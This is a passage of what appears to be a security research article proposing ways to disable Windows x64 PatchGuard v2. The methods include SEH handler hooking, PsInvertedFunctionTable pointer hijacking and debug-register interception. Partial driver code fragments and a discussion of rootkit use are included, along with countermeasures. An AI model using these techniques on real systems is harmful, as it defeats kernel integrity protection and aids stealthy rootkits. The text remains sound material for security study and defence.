techniques are applicable to the version of PatchGuard currently shipping with
Windows XP x64 Edition with all hotfixes, Windows Server 2003 x64 Edition with
all hotfixes, and Windows Vista x64 with all hotfixes at the time that this
article was written.  The author has only written a complete implementation of
the first proposed bypass technique, although the remaining proposed bypass
approaches are expected to be viable in principle.

4.1) Interception of _C_specific_handler

The simplest course of action for disabling PatchGuard version 2 is, in the
author's opinion, to intercept execution at _C_specific_handler.  The
_C_specific_handler routine is responsible for dispatching exceptions for
routines compiled with the Microsoft C/C++ compiler (and using try/except,
try/finally, or try/catch clauses).  This set of functions includes all ten of
the PatchGuard DPC routines and most other C/C++ functions in the kernel.  It
also includes many third party driver routines; _C_specific_handler is
exported, and the compiler references this function for all C/C++ images that
utilize SEH in some form (imported from ntoskrnl).  Due to this, Microsoft is
forced to export _C_specific_handler from the kernel perpetually, making it
difficult for Microsoft to deny access to the routine's address from the
perspective of third party drivers.  Furthermore, because _C_specific_handler
is exported from the kernel, it is trivial to retrieve its address across all
kernel versions from the context of a third party driver.  This approach
capitalizes on the fact that PatchGuard utilizes SEH in order to obfuscate the
call to the system integrity checking routine, in effect turning this
obfuscation mechanism into a convenient way to hijack execution control before
the system integrity check is actually performed.

This approach can be implemented in several different ways, but the basic idea
is to intercept execution somewhere between the faulting instruction in the
PatchGuard DPC (whichever is selected at boot time) and the exception handlers
associated with the DPC routine which invoke the PatchGuard system integrity
check routine.
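Resolving the interception point from a driver is correspondingly trivial; for
example (the wrapper is illustrative, and only the export name and
MmGetSystemRoutineAddress are assumed):

//
// Returns the address of the kernel's exported _C_specific_handler, which
// works identically across kernel versions because only the export table
// is consulted.
//
PVOID
LocateCSpecificHandler(
    VOID
    )
{
    UNICODE_STRING RoutineName =
        RTL_CONSTANT_STRING(L"_C_specific_handler");

    return MmGetSystemRoutineAddress(&RoutineName);
}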
With this in mind, _C_specific_handler is exactly what one could hope for;
_C_specific_handler is invoked when the benign access violation triggered by
the bogus DeferredContext value passed to the PatchGuard DPC routine is
raised.  Furthermore, being exported, there are no concerns with compatibility
with future kernel versions, or different flavors of the kernel (PAE vs
non-PAE, MP vs UP, and so forth).

Although hooking _C_specific_handler provides a convenient way to gain control
of execution in the execution path for the PatchGuard check routine, there
remains the problem of how to safely defuse the check routine and resume
execution at a safe point such that DPCs continue to be processed by the
system in a timely fashion.  On x86, this would pose a serious problem, as in
this context, we (as an attacker attempting to bypass PatchGuard) would gain
control at an exception handler with a context record describing the context
in the middle of the PatchGuard DPC routine, with no good way to unwind the
context back up to the DPC routine's caller (the kernel timer DPC dispatcher).

Ironically, because PatchGuard exists only on x64 and not on x86, this problem
is trivial where it might have been difficult to solve in a generalized
fashion on x86.  Specifically, there is extensive unwind support baked into
the core of the x64 calling convention on Windows, such that there exists
metadata describing how to unwind any function that manipulates the stack at
any point in its execution lifetime.  This metadata is used to implement
unwind semantics that allow functions to be cleanly unwound without having to
call exception/unwind handlers implemented in code, which depend on the
execution context of the routine they are associated with.  This extensive
unwind metadata can be used to our advantage here, as it provides a clean
mechanism to unwind past the DPC routine (to the DPC dispatcher) in a
completely compatible and kernel-version-independent manner.  Furthermore,
there is no good way for Microsoft to disable this unwind metadata, given how
deeply involved it is with the x64 calling convention.

The process of using the unwind metadata of a function to unwind an execution
context is known as a virtual unwind, and there is a documented, exported
routine [5] to implement this mechanism: RtlVirtualUnwind.  Using
RtlVirtualUnwind, it is possible to alter the execution context that is
provided as an argument to _C_specific_handler (and thus the hook on
_C_specific_handler).  This execution context describes the machine state at
the time of the access violation in the PatchGuard DPC routine.  After
performing a virtual unwind on this execution context, all that remains is to
return the manifest ExceptionContinueExecution constant to the kernel mode
exception dispatcher in order to realize the altered context.  This completely
bypasses the PatchGuard system integrity check.  As an added bonus, the hook
on _C_specific_handler is only needed until the first time PatchGuard is
called.  This is due to the fact that the PatchGuard timer is a one-shot
timer, and as the code to re-queue the timer is skipped by the virtual unwind,
PatchGuard is effectively permanently disabled for the remainder of the
Windows boot session.

The last remaining obstacle with this bypass technique is filtering out the
specific PatchGuard access violation exceptions from legitimate access
violations that kernel mode code may produce.
This is important, as access
violations in kernel mode are a normal part of parameter validation (the probe
and lock model used to validate user mode pointers) for drivers and system
services.  Fortunately, it is easy to make this determination, as it is
generally only legal to use a try/except to catch an access violation relating
to a user mode address from kernel mode (as previously described).  PatchGuard
is a rare exception to this rule, in that it has a well-defined no-mans-land
region where accesses can be attempted without fear of a bugcheck occurring.
As a result, it is a safe assumption that any access violation relating to a
kernel mode address is either PatchGuard triggering its own execution, or a
very badly behaved third party driver that is grossly breaking the rules
relating to Windows kernel mode drivers.  It is the author's opinion that the
latter case is not worth considering as a blocker, especially since if such a
completely broken driver were to exist, it would already be randomly bringing
the system down with bugchecks.  It is worth noting, as an addendum, that the
referenced address in the exception information block passed to the exception
handler will always be 0xFFFFFFFF`FFFFFFFF due to how violations on
non-canonical addresses are reported by the processor.  This does not impact
the viability of this technique as a valid way to bypass PatchGuard in a
version-independent manner, however.

It is also worth noting that the fact that this technique involves modifying
the kernel is not a problem (aside from the inherent race conditions involved
in safely patching a running binary).  The hook will disable PatchGuard before
PatchGuard has a chance to notice the hook from the context of the system
integrity check routine.

This proposed approach has several advantages over the previously suggested
approach by Uninformed's original paper on PatchGuard[2].  Specifically, it
does not involve locating each individual DPC routine (and does not even rely
on any sort of code fingerprinting; only exported symbols are used).  This
improves both the reliability of the proposed approach (as code fingerprinting
always introduces an additional margin of error as far as false positives go)
and its resiliency to attack by Microsoft.  Because this technique relies
solely on exported functions, and does not carry any sort of dependency on how
many possible DPCs are available to PatchGuard for use (or any sort of
dependency on locating them at runtime), blocking this approach would be
significantly more involved than simply adding another possible DPC routine or
changing the attributes of an existing DPC routine in an effort to thwart
third-party drivers that were taking a signature-based approach to locating
DPC routines for patching.

Although this technique is quite resilient to kernel changes that do not
directly involve the underlying mechanisms by which PatchGuard itself
functions (the fact that it can operate unmodified on both Windows Server 2003
x64 and Windows Vista x64 is testament to this fact), there are a number of
different ways by which Microsoft could block this attack in a future update
to PatchGuard.  The most obvious solution is to entirely abandon SEH as a core
mechanism involved in arranging for the PatchGuard system integrity check.
Abandoning SEH removes the convenient mechanism (hooking _C_specific_handler)
that is presented here as a version-independent way to hook into the execution
path involved in PatchGuard's system integrity check.  If Microsoft were to go
this route, a would-be attacker would need to devise another mechanism to
achieve control of execution before the system integrity check runs.  Assuming
that Microsoft played their hand correctly, a future PatchGuard revision would
not have such an easily-accessible mechanism to hook into the execution
process in a generic manner, largely counteracting this proposed approach.
Microsoft could also employ some sort of pre-validation of the exception
handler path before the DPC triggers an exception, although given that this is
not the easiest and most elegant way to counter such a technique, the author
feels that it is an unlikely solution.

4.2) Interception of DPC Exception Registration

Presently, all execution paths leading to the execution of PatchGuard DPC
routines involve an exception/unwind handler.  This is another single point of
failure that can be exploited by third parties attempting to disable
PatchGuard.  An approach involving the detection of all of the PatchGuard DPC
routines, followed by interception of the exception handler registrations for
each DPC, is proposed as another means of defeating PatchGuard.

Though this technique is not as clean or clear-cut as the technique proposed
in 4.1, this approach is considered by the author as a viable bypass mechanism
for PatchGuard version 2.  This technique essentially involves patching the
exception registrations for each possible DPC routine that could be used by
PatchGuard, such that each exception registration points to a routine that
employs a virtual unwind to safely exit out of the PatchGuard DPC without
invoking the system integrity check.  Any such approach faces several
obstacles, however.

The first major difficulty for this technique is locating each PatchGuard DPC.
Since none of the PatchGuard DPC routines are exported, a little bit more
creative thinking is involved in finding the locations to patch.  The author
feels that a combination of pattern matching and code fingerprinting would
best serve this goal; there are a number of commonalities between the
different PatchGuard DPC routines that could be used to locate them with a
relatively high degree of confidence in PatchGuard version 2.  Specifically,
the author feels that the following criteria are acceptable for use in
detecting the PatchGuard DPC routines:

 1. Each DPC routine has one exception/unwind-marked registration with
    _C_specific_handler.
 2. Each DPC routine has exactly four _C_specific_handler scopes.
 3. Each DPC routine is referenced in raw address form (64-bit pointer) in
    the executable code sections comprising ntoskrnl at least twice.
 4. Each DPC routine has at least two _C_specific_handler scopes with an
    associated unwind/exception handler.
 5. Each DPC routine has exactly one _C_specific_handler scope with a call to
    a common subfunction that references RtlUnwindEx (an exported routine).
 6. Each DPC routine has several sets of distinctive, normally rare
    instructions (ror/rol instructions).

Given several (or even all) of these criteria, it should be possible to
accurately locate all ten DPC routines by scanning non-pageable code in the
kernel; a sketch of the exception directory enumeration that this entails
follows.
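Most of these criteria boil down to questions about the kernel's exception
directory, which a driver can walk directly once the kernel image base is in
hand.  A rough illustrative sketch of that enumeration step (the callback type
and names are placeholders, header validation is omitted, and the per-entry
UNWIND_INFO parsing needed to evaluate the scope-related criteria is not
shown):

#include <ntimage.h>

typedef VOID (*PEXAMINE_FUNCTION_ENTRY)(
    PVOID ImageBase,
    PIMAGE_RUNTIME_FUNCTION_ENTRY FunctionEntry
    );

VOID
EnumerateKernelFunctionEntries(
    IN PVOID KernelBase,                    // located as described below
    IN PEXAMINE_FUNCTION_ENTRY Examine      // caller-supplied inspection logic
    )
{
    PIMAGE_DOS_HEADER             DosHeader;
    PIMAGE_NT_HEADERS             NtHeaders;
    PIMAGE_DATA_DIRECTORY         Directory;
    PIMAGE_RUNTIME_FUNCTION_ENTRY Entries;
    ULONG                         Count;
    ULONG                         Index;

    DosHeader = (PIMAGE_DOS_HEADER)KernelBase;
    NtHeaders = (PIMAGE_NT_HEADERS)((PUCHAR)KernelBase + DosHeader->e_lfanew);
    Directory = &NtHeaders->OptionalHeader.
                    DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION];

    Entries = (PIMAGE_RUNTIME_FUNCTION_ENTRY)((PUCHAR)KernelBase +
                  Directory->VirtualAddress);
    Count   = Directory->Size / sizeof(IMAGE_RUNTIME_FUNCTION_ENTRY);

    for (Index = 0; Index < Count; Index += 1)
        Examine(KernelBase, &Entries[Index]);
}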
It is possible to locate the exception registration information for +the DPC routines through processing of the exception directory for the kernel +(and indeed, most of the criteria require doing this as a prerequisite). +Locating the kernel image base is fairly trivial as well; the address of an +exported routine can be taken, and truncated to a 64K region. From there, one +need only perform downward searches in 64K increments for the DOS header +signature (followed by a check for a PE32+ header). + +Another hurdle that must be solved for this approach is the placement of the +replacement exception handler routines. These routines are required to be +within 4GB of the kernel image base (there is only a 32-bit RVA in the unwind +metadata), meaning that in general, it is not practical to simply store them +in a driver binary or pool allocation (by default, these addresses are usually +far more than 4GB away from the kernel image base). There are no documented +and exported routines to allocate kernel mode virtual memory at a specific +virtual address to the author's knowledge. However, other, less savory +approaches could theoretically be taken (such as allocating physical memory +and altering paging structures directly to create a valid memory region within +4GB of the kernel image base). + +After one has solved these difficulties, the rest of this approach is fairly +trivial (and similar to portions of the technique described in 4.1). +Specifically, the replaced exception handlers need to invoke RtlVirtualUnwind +to unwind back to the kernel DPC dispatcher, and then request that execution +be resumed at the unwound context. + +This mechanism is not nearly as robust as the first in the author's point of +view, though both approaches could be disabled by abandoning SEH entirely as a +critical path in the execution of the PatchGuard system integrity check +routine. Specifically, Microsoft could change the characteristics of the DPC +routines in an attempt to frustrate fingerprinting and detection of them at +runtime. Pre-validation of unwind metadata (or additional checks in the +exception dispatcher itself to ensure that all SEH routines registered as part +of an image are within the confines of the image in-memory) could also be used +to defeat this technique. There are other security benefits to validating +that SEH routines on x64 that are registered as part of an image really exist +within an image, as will be discussed below. As such, the author would expect +this to appear in a future Windows version. + +4.3) Interception of PsInvertedFunctionTable + +Another variation on the theme of intercepting PatchGuard within the SEH code +path critical to the system integrity check routine involves taking advantage +of an optimization that exists in the x64 exception dispatcher. Specifically, +it is possible to utilize the fact that the exception dispatcher on x64 uses a +cache to improve the performance of exception handling. By taking advantage +of this cache, it may be possible to intercept control of execution when the +PatchGuard DPC routine deliberately creates an access violation exception in +order to trigger the system integrity check. This proposed technique uses the +nt!PsInvertedFunctionTable global variable in the kernel, which represents a +cache used to perform a fast translation of RIP values to an associated image +base and exception directory pointer, without having to do a (slow) search +through the linked list of loaded kernel modules. 
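The forward translation that this cache accelerates is itself reachable from a
driver through an exported routine, for example (a trivial illustrative
wrapper):

//
// Translates an instruction pointer into the owning image base and its
// unwind metadata entry, which is the query that PsInvertedFunctionTable
// exists to make fast.
//
PRUNTIME_FUNCTION
LookupUnwindEntry(
    IN ULONG64 ControlPc,
    OUT PULONG64 ImageBase
    )
{
    return RtlLookupFunctionEntry(ControlPc, ImageBase, NULL);
}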
+ +This technique is fairly similar to the one described in technique 4.2. Instead +of altering the actual exception directory entries corresponding to each +PatchGuard DPC routine in the kernel's image in-memory, this technique alters +the cached exception directory pointer stored within PsInvertedFunctionTable. +PsInvertedFunctionTable is consulted by RtlLookupFunctionTableEntry, in order +to translate a RIP value to an associated image (and unwind metadata block). +The logic within RtlLookupFunctionTable is essentially to search through the +cached entries resident in PsInvertedFunctionTable for an image that +corresponds to a given RIP value. If a hit is found, then the exception +directory pointer is loaded directly from the PsInvertedFunctionTable cache, +instead of through the (slower) process of parsing the PE header of the given +image. If no hit is found, then the loaded module linked list is searched. +Assuming a hit is made in the loaded module list, then the PE header for the +associated module is processed in order to locate the exception directory for +the module. From there, the exception directory is searched to locate the +unwind metadata block corresponding to the function containing the specified +RIP value. + +The structure backing PsInvertedFunctionTable (RTL_INVERTED_FUNCTION_TABLE) +can be described as so in C: + +typedef struct _RTL_INVERTED_FUNCTION_TABLE_ENTRY +{ + PIMAGE_RUNTIME_FUNCTION_ENTRY ExceptionDirectory; + PVOID ImageBase; + ULONG ImageSize; + ULONG ExceptionDirectorySize; +} RTL_INVERTED_FUNCTION_TABLE_ENTRY, * PRTL_INVERTED_FUNCTION_TABLE_ENTRY; + +typedef struct _RTL_INVERTED_FUNCTION_TABLE +{ + ULONG Count; + ULONG MaxCount; // always 160 in Windows Server 2003 + ULONG Pad[ 0x2 ]; + RTL_INVERTED_FUNCTION_TABLE_ENTRY Entries[ ANYSIZE_ARRAY ]; +} RTL_INVERTED_FUNCTION_TABLE, * PRTL_INVERTED_FUNCTION_TABLE; + +In Windows Server 2003, there is space reserved for up to 160 loaded modules +in the array contained within PsInvertedFunctionTable. In Windows Vista, this +number has been expanded to 512 module entries. The array of loaded modules +is maintained by the system module loader such that when a module is loaded or +unloaded, a corresponding entry within PsInvertedFunctionTable is created or +deleted, respectively. It is not a fatal error for the module array within +PsInvertedFunctionTable to be exhausted; in this case, performance for +exception dispatching relating to additional modules will be slower, but the +system will still function. + +Because the RIP-to-exception-directory cache described by +PsInvertedFunctionTable maintains a full 64-bit pointer to the exception +directory of the associated module, it is possible to disassociate the cached +exception directory pointer from its corresponding image. In other words, it +is possible to modify the ExceptionDirectory member of a particular cached +RTL_INVERTED_FUNCTION_TABLE_ENTRY to point to an arbitrary location instead of +the exception directory of that module. There are no security or integrity +checks that validate that the ExceptionDirectory member points to within the +given image. This could be exploited by a third-party driver in order to take +control of exception dispatching for any of the first 160 (or 512, in the case +of Windows Vista) kernel modules. This loaded module list includes critical +images such as the HAL (typically the first entry in the cache) and the kernel +itself (typically the second entry in the cache). 
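Once the kernel's cache entry has been located and a suitably adjusted shadow
copy of the exception directory has been prepared (both described next), the
takeover itself can be reduced to a single atomic pointer exchange.  A
hypothetical fragment in terms of the structures above:

//
// Swaps the cached exception directory pointer of one cache entry for a
// caller-prepared shadow directory and returns the original pointer.
// Locating KernelEntry and building ShadowDirectory are separate problems
// that are not shown here.
//
PIMAGE_RUNTIME_FUNCTION_ENTRY
SwapCachedExceptionDirectory(
    IN PRTL_INVERTED_FUNCTION_TABLE_ENTRY KernelEntry,
    IN PIMAGE_RUNTIME_FUNCTION_ENTRY ShadowDirectory
    )
{
    return (PIMAGE_RUNTIME_FUNCTION_ENTRY)InterlockedExchangePointer(
        (PVOID volatile *)&KernelEntry->ExceptionDirectory,
        (PVOID)ShadowDirectory);
}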
With respect to bypassing +PatchGuard, this makes it possible for a third party driver to copy the +exception directory data of the kernel to dynamically allocated memory and +adjust it such that exception handlers for the PatchGuard DPC routines point +to a stub function that invokes a virtual unwind as described in technique 4.2. +After setting up its altered shadow copy of the exception directory for the +kernel, all that a third party driver would need to do is swap the +ExceptionDirectory pointer within the PsInvertedFunctionTable cache entry for +the kernel with the pointer to the shadow copy. Following that, this approach +is essentially the same as the proposed approach described in 4.2. It has the +added advantage of being more difficult to detect from the perspective of +validating the integrity of the exception dispatching path, as the exception +directory associated with the kernel image in-memory is not actually altered; +only a pointer to the exception directory in a cache is changed. + +This approach does require a reliable mechanism to detect +PsInvertedFunctionTable (which is not exported) at run-time, however. The +author feels that this is not a particularly difficult task, as the first few +members of PsInvertedFunctionTable (specifically, the maximum entry count and +the entries for the HAL and kernel) will have predictable values that can be +used in a classic egghunt style search of kernel global variable space. +Additional heuristics, such as requiring several data references to the +suspected PsInvertedFunctionTable location within kernel code could be applied +as well, in the interest of improving accuracy. + +This proposed approach may be countered by many of the proposed counters to +techniques 4.1 and 4.2. Additionally, this technique could also be countered by +validating exception directory pointers within PsInvertedFunctionTable, such +as by ensuring that such exception directory pointers are within the confines +of the purported associated image. Although this validation is not perfect +since it might still be possible for one to reposition the exception directory +pointer to a different location within the image that could be safely modified +at runtime, such as overlapping a large global variable array or the like, it +would certainly increase the difficulty of subverting the exception +dispatcher's RIP translation cache. Additional validation techniques, such as +requiring that the exception directory point to read-only memory, could be +similarly adopted to reduce the chance that a third party driver could +meaningfully subvert the cache (with results leading to something other than a +system crash). + +It should be noted that in the current implementation, PsInvertedFunctionTable +presents a relatively inviting target for potentially malicious software to +hijack parts of the kernel without being detected. Indeed, through careful +planned subversion of PsInvertedFunctionTable, third party software could take +control of exception dispatchers throughout the kernel in order to gain +control of execution. Though this technique would be much more limited than +outright kernel patching, it has the advantage of being completely undetected +by current PatchGuard versions (which cannot validate global variables that +may change without notice at runtime, for obvious reasons). It also has the +advantage of being undetected by current rootkit detection systems, which are +presently (to the author's knowledge) blissfully unaware of +PsInvertedFunctionTable. 
Although it would require administrative permissions
(or an exploit granting such permissions) for an attacker to modify
PsInvertedFunctionTable in the first place, Microsoft has of late focused a
great deal of effort on protecting the kernel even from users with
administrator permissions.  For example, one could conceive of a rootkit-style
program that intercepts exception dispatchers for system services, and passes
invalid user mode pointers to system services in order to surreptitiously
execute kernel mode code without detection when the standard pointer probe
throws an exception indicating that the given user mode pointer parameter is
invalid.  Given this sort of threat (from the rootkit perspective), the author
feels that it would be in Microsoft's best interests to put into place
additional validation of PsInvertedFunctionTable's cached exception directory
pointers (assuming that Microsoft wishes to continue down the path of
strengthening the kernel against malicious administratively-privileged code).

4.4) Interception of KiDebugTrapOrFault

Although many of the proposed techniques for blocking PatchGuard have so far
relied on the fact that PatchGuard utilizes SEH to kick off execution of the
system integrity check, there are different approaches that can be taken which
do not rely on this specific PatchGuard implementation detail.  One such
alternative technique for bypassing PatchGuard involves subverting the kernel
debug fault handler: KiDebugTrapOrFault.  This handler represents the entry
point for all debug exceptions (such as so-called hardware breakpoints), and
as such presents an attractive target for bypassing PatchGuard.

The basis of this proposed technique is to utilize a set of hardware
breakpoints to intercept execution at a convenient critical location within
PatchGuard's execution path leading up to the system integrity check.  This
technique has a greater degree of flexibility than many of the previously
described techniques, though this flexibility comes at the cost of a
significantly more involved (and difficult) implementation.  Specifically, one
could use this proposed technique to intercept control at any point critical
to the execution of PatchGuard's system integrity check (for example, the
kernel DPC dispatcher, one of the PatchGuard DPC routines, or a convenient
location in the exception dispatching code path, such as _C_specific_handler).

The means by which this interception of execution could be accomplished is to
assume control of debug exception handling.  This could be done in several
different ways; for example, one could hook KiDebugTrapOrFault or alter the
IDT directly to simply repoint the debug exception to driver-supplied code,
bypassing KiDebugTrapOrFault entirely.  There are even ways that this
interception could be done in a way that is transparent to the current
PatchGuard implementation, such as by intercepting PsInvertedFunctionTable as
described in technique 4.3.  A driver could then alter the unwind metadata for
KiDebugTrapOrFault and create an exception handler for this routine.  This
step would allow transparent, first-chance access to all debug faults (because
KiDebugTrapOrFault internally constructs and dispatches a STATUS_SINGLE_STEP
exception describing the debug fault; normally, this would present the
STATUS_SINGLE_STEP exception to a debugger, but there is no technical reason
why a standard SEH-style exception handler could not catch the exception).
+
+Regardless of how control of execution at the debug trap handler is gained,
+the next step in this proposed approach is to alter execution at the
+requested point of interest (whether it be the kernel timer DPC dispatcher,
+which could be easily found by queuing a DPC and executing a virtual unwind,
+or a PatchGuard DPC routine, or _C_specific_handler, or any other place of
+interest in the critical PatchGuard execution path) to prevent PatchGuard's
+system integrity check from executing.
+
+After the implementor has established control over the debug trap handler
+(through whichever means desired), all that remains is to set
+debug-register-based breakpoints on target locations. When these breakpoints
+are hit, control is transferred to the debug trap handler, and from there to
+the implementor's driver code, which can act as necessary, such as by
+altering the execution context of the processor at the time of the exception
+before resuming execution.
+
+The advantages of this approach over directly patching into kernel code (i.e.
+opcode replacement) are threefold. First, it is more flexible in that there
+are no difficulties with placing an absolute 64-bit jump in an arbitrary
+location (in x64, this typically takes around 12 opcode bytes to do from any
+arbitrary location in memory). For example, one does not have to worry about
+whether the opcode space overwritten by the jump might span an instruction
+boundary that is itself a jump target, which might lead to invalid code being
+executed. Secondly, this approach can be used to get out of having to
+implement a disassembler (or other similar forms of code analysis) in kernel
+mode, as hardware breakpoints allow one to gain control of execution at a
+precise location without having to worry about creating enough space for a
+jump patch, and then placing the original instructions back into a jump stub
+to allow execution to resume at the original effective instruction stream (if
+desired). Finally, if done correctly, this technique could be implemented in
+a truly race-condition free manner (as the only patching that would need to
+be done is an interlocked 8-byte swap of a pointer-aligned value in
+PsInvertedFunctionTable, if one took that approach).
+
+This approach does require that the implementor pick a location (or multiple
+locations) in the kernel that are to have breakpoints set on them in order to
+gain execution control. There are many possibilities, such as the DPC
+dispatcher (where one could filter out the PatchGuard DPC by detecting, say,
+invalid kernel pointers in DeferredContext), the exception dispatcher path
+(where one could unwind past a PatchGuard DPC's access violation exception),
+a PatchGuard DPC itself (where one could again unwind past with
+RtlVirtualUnwind, bypassing PatchGuard if the DPC is being invoked by
+PatchGuard), or any other choice area. One of the advantages of this approach
+is that it is comparatively easy to intercept execution anywhere in the
+kernel that can be reliably located across kernel versions, making it
+potentially a great deal easier to adapt to defeat future PatchGuard
+implementations than some of the previously discussed bypass techniques.
+
+Normally, the kernel has logic in place that prevents stray kernel addresses
+from being placed in debug registers by user mode code via NtSetContextThread.
+It may be necessary to make additional alterations to ensure that the custom
+values in the debug registers are persisted across context switches, via the
+same mechanisms used by the kernel debugger to persist debug registers.
+
+In the author's opinion, this technique would be difficult for Microsoft to
+defeat in principle, barring hardware support (like virtualization). Although
+Microsoft could move around critical code paths for PatchGuard, this
+technique presents a general mechanism by which any location in the kernel
+could be surreptitiously intercepted, thus lending itself to relatively easy
+adaptation to future PatchGuard revisions. One approach that could be taken
+is to perform increased validation of the debug trap handler in an attempt to
+make it more difficult to intercept without being detected by PatchGuard or
+some other validation mechanism. Another counter to this sort of tactic (in
+general) would be to make it difficult for a third party driver to locate all
+of the critical code paths in a consistent and reliable manner across all
+kernel versions. This is likely to prove difficult, as a great deal of the
+internal workings of the kernel are exposed in some way to drivers (i.e.
+exported functions), or are otherwise indirectly exposed to drivers (i.e.
+trap labels via the IDT, exception handlers via unwind metadata and exports
+used in the process of dispatching exceptions to SEH registrations).
+Completely insulating PatchGuard from all such externally visible locations
+(that could be comparatively easily compromised by a third party driver)
+would, as a result, likely be an arduous task.
+
+The debug trap handler can be used to do more than simply evade PatchGuard
+for purposes of allowing conventional kernel code patches via opcode
+replacement. It can also be utilized in order to completely eliminate the
+need to perform opcode-replacement-based kernel patches in order to gain
+execution control. In this vein, by assuming control of the debug trap
+handler in a way that is transparent to PatchGuard (such as via the proposed
+PsInvertedFunctionTable-based approach), it would then be possible to set
+debug-register-based breakpoints at every address of interest (assuming that
+there are enough debug registers to cover all of the locations of interest).
+From the debug trap handler, it is possible to completely alter the execution
+context at the point of the debug exception, which is exactly the same as
+what one could do via traditional opcode-replacement-based patching for a
+given location. This sort of transparent patching would be extremely
+difficult for Microsoft to detect, because the debug registers must remain
+available for use by the kernel debugger. Short of completely crippling the
+ability of the kernel debugger to set breakpoints without being attached
+before PatchGuard is initialized, the author does not see a particularly
+viable (i.e. without a trivial workaround) way for Microsoft to prevent the
+use of debug registers to alter execution context at select points in the
+kernel (from a third party driver). Because such an approach would capitalize
+on the fact that Microsoft must, from a business case perspective, make it
+possible for IHVs and ISVs to debug their code on Windows, the author
+believes that it would be unlikely to be successfully disabled by Microsoft.
Furthermore, because such techniques +can be implemented without even having the basic requirement of disabling +PatchGuard, they would be inherently much more likely to work with future +PatchGuard revisions. After all, if PatchGuard can't even detect changes to +the kernel (because kernel code isn't being patched), then there is no reason +to even bother with trying to disable it, which gets one out of the +comparatively messy business of playing catch-up with Microsoft with each new +PatchGuard revision. + +4.5) General Detect Bit Interception + +One of PatchGuard's anti-debug mechanisms relates to debug registers. +Specifically, PatchGuard attempts to clear Dr7 (the debug control register) in +an attempt to disable all debug-register-based breakpoints, as one of the +first tasks upon entering the system integrity check routine. This presents +an inherent weakness within PatchGuard, as there is support built-in to the +processor that allows one to detect (and intercept) direct accesses to any of +the debug registers. This support is primarily legacy, intended for so-called +in-circuit emulators (ICEs), which were special hardware components that acted +as a true hardware-based debugger by allowing one to control a processor from +outside the context of the system entirely, in essence truly isolating the +debugger from the operating system and any programs running under it. This +support is embodied in the General Detect bit in Dr7, which when set, causes a +debug trap to be generated on any successful access to a debug register. This +is significant in that it provides a way for an attacker to trap PatchGuard's +access to Dr7 (zeroing it), which in effect provides a means to pinpoint the +exact location of PatchGuard's system integrity routine in-memory, +in-plaintext. Furthermore, it gives an attacker the possibility of making any +alterations desired to the execution context at the very start of the system +integrity check, which could be trivially used in order to simply implement an +immediate return out of the system integrity check logic without actually +verifying the system's integrity (as dr7 is zeroed before any integrity checks +are performed). This approach effectively turns another one of PatchGuard's +protection mechanisms against it, utilizing the anti-debug-register behavior +to detect (and block) PatchGuard. + +The general idea behind this approach is similar to that described in +technique 4.4. In the same fashion as in technique 4.4, an implementor of this +approach is required to gain control of the debug trap handler. For this +task, any of the proposed approaches in technique 4.4 may be used. After control +of the debug trap handler is established, an attacker must then set the +general detect bit in Dr7 and wait for PatchGuard to access the debug +registers. It should be noted that during the legitimate course of execution, +the kernel itself will often directly access debug registers, such as during +context switches or if NtSetContextThread/NtGetContextThread are invoked. Any +such implementation of this technique must be able to differentiate between +PatchGuard's accesses of the debug registers and legitimate accesses. This +could be trivially implemented by checking if the RIP value at the time of the +trap was within a valid kernel image or not, as the PatchGuard system +integrity check routine resides in dynamically allocated non-paged pool and +not within the confines of the kernel images in-memory. 
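+
+As a rough illustration, the following sketch shows how the general detect
+bit might be set and how a subverted debug trap handler (obtained through any
+of the means described in technique 4.4) might distinguish PatchGuard's
+access to dr7 from a legitimate one. The __readdr/__writedr compiler
+intrinsics are real, but the bit definitions and the single-image bounds
+check are simplifications; a complete implementation would consult the full
+loaded module list rather than just the kernel image, whose bounds are
+assumed to have been obtained elsewhere (for example, via
+AuxKlibQueryModuleInformation).
+
+#include <ntddk.h>
+#include <intrin.h>
+
+#define DR7_GENERAL_DETECT (1ULL << 13) // GD: trap on debug register access
+#define DR6_BD             (1ULL << 13) // BD: trap was a debug register access
+
+//
+// Arm the general detect bit. The processor clears GD when the resulting
+// debug trap is delivered, so the trap handler itself may touch the debug
+// registers freely.
+//
+VOID
+EnableGeneralDetect(
+    VOID
+    )
+{
+    __writedr(7, __readdr(7) | DR7_GENERAL_DETECT);
+}
+
+//
+// Called from a subverted debug trap handler. PatchGuard's integrity check
+// runs from dynamically allocated non-paged pool, so a debug register access
+// whose rip lies outside the kernel image is a strong hint that PatchGuard
+// (rather than the kernel's context switch or Nt*ContextThread paths) is the
+// code zeroing dr7.
+//
+BOOLEAN
+IsPatchGuardDebugRegisterAccess(
+    ULONG64 TrapRip,
+    ULONG64 KernelBase,
+    ULONG64 KernelSize
+    )
+{
+    if ((__readdr(6) & DR6_BD) == 0)
+        return FALSE;
+
+    return (TrapRip < KernelBase) || (TrapRip >= KernelBase + KernelSize);
+}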
+ +When the debug trap handler is invoked as a result of PatchGuard zeroing Dr7, +then the appropriate action (which could be as trivial as simply executing a +hard return out of the system integrity check routine) can be taken by the +third-party driver wishing to disable PatchGuard. + +Like the techniques that capitalize on PatchGuard's use of SEH to obfuscate +the call to the system integrity check routine, this approach relies on using +one of PatchGuard's defensive mechanisms against it. The most obvious counter +would be to thus remove the behavior of zeroing debug registers. However, +disabling this behavior may not be very desirable, as it would then be very +easy to detect PatchGuard by, say, setting a read breakpoint on kernel code +and waiting for PatchGuard to perform a read. Since reads of kernel code (as +opposed to execute fetches) are fairly atypical, this would open up another +easy mechanism by which PatchGuard could be bypassed. + +The best course of action by Microsoft here would be to make it as difficult +as possible to differentiate between legitimate accesses to debug registers +and PatchGuard's own accesses, although this is likely to not be very doable. +Strengthening the debug trap path against interception by placing additional +validation checks over that code path might also be useful in countering this +technique, although likely to only a limited, easily-bypassable extent. + +4.6) Patching the Kernel Timer DPC Dispatcher + +Currently, PatchGuard utilizes a timer with an associated DPC to transfer +control to a preselected one of ten possible legitimate DPC routines that have +been slightly modified for use with PatchGuard. Because third party kernel +drivers are given a documented and exported interface to create timers with +associated DPC routines, this represents a weakness in PatchGuard, in that it +presents an easily-detectable location in the critical execution path for +PatchGuard's system integrity check routine that could be relatively easily +compromised by a third-party driver. This technique focuses on gaining +control of the timer DPC dispatcher, with the goal of detecting when the +PatchGuard DPC is about to be dispatched. When the PatchGuard DPC is +detected, then the third-party driver could skip over the PatchGuard DPC +routine entirely, thus disabling PatchGuard. + +In order to accomplish this, a third party driver would need to locate the +exact instruction within the kernel timer DPC dispatcher that is responsible +for making calls to timer DPC routines. Fortunately, this is a fairly easy +task 